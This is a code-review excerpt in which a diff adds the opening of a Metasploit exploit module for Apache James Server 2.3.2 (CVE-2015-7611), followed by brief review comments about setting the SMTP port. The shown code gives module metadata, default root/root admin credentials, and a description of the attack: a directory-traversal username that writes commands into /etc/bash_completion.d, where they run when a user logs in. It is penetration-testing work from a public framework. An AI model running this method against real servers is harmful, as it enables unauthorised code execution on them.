modules/exploits/linux/smtp/apache_james_exec.rb

```diff
@@ -0,0 +1,143 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write",
+      'Description'    => %q{
+        To use this module, start a listener using the given payload, host, and
+        port before running the exploit. After running the exploit, the payload
+        will be executed when a user logs into the system. This module exploits
+        a vulnerability that exists due to a lack of input validation when
+        creating a user. Messages for a given user are stored in a directory
+        partially defined by the username. By creating a user with a directory
+        traversal payload as the username, commands can be written to a given
+        directory. For this exploit, bash completion must be enabled to
+        gain code execution. This exploit will leave 2 Apache James mail
+        object artifacts in the /etc/bash_completion.d directory and the
+        malicious user account.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+        'Palaczynski Jakub', # Discovery
+        'Matthew Aberegg',   # Metasploit
+        'Michael Burkey'     # Metasploit
+      ],
+      'References'     =>
+      [
+        [ 'CVE', '2015-7611' ],
+        [ 'EDB', '35513' ],
+        [ 'URL', 'https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf' ]
+      ],
+      'Platform'       => 'linux',
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Targets'        =>
+      [
+        [ 'Linux x86',       { 'Arch' => ARCH_X86 } ],
+        [ 'Linux x64',       { 'Arch' => ARCH_X64 } ]
+      ],
+      'Privileged'     => true,
+      'DisclosureDate' => "Oct 1 2015",
+      'DefaultTarget'  => 0,
+      'CmdStagerFlavor'=> [ 'printf' ],
+      'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => 'true'
+        }
+      ))
+      register_options(
+        [
+          OptString.new('USERNAME', [ true, 'Root username for James remote administration tool', 'root' ]),
+          OptString.new('PASSWORD', [ true, 'Root password for James remote administration tool', 'root' ]),
+          OptString.new('ADMINPORT', [ true, 'Port for James remote administration tool', '4555' ])
+        ])
```

Comment:
I would also add:
```
Opt::RPORT(25)
```
Since this is targeting an SMTP server.

Reply:
I'll add that as I'm working on the rewrite!

Reply:
Added this in, thanks for the suggestion!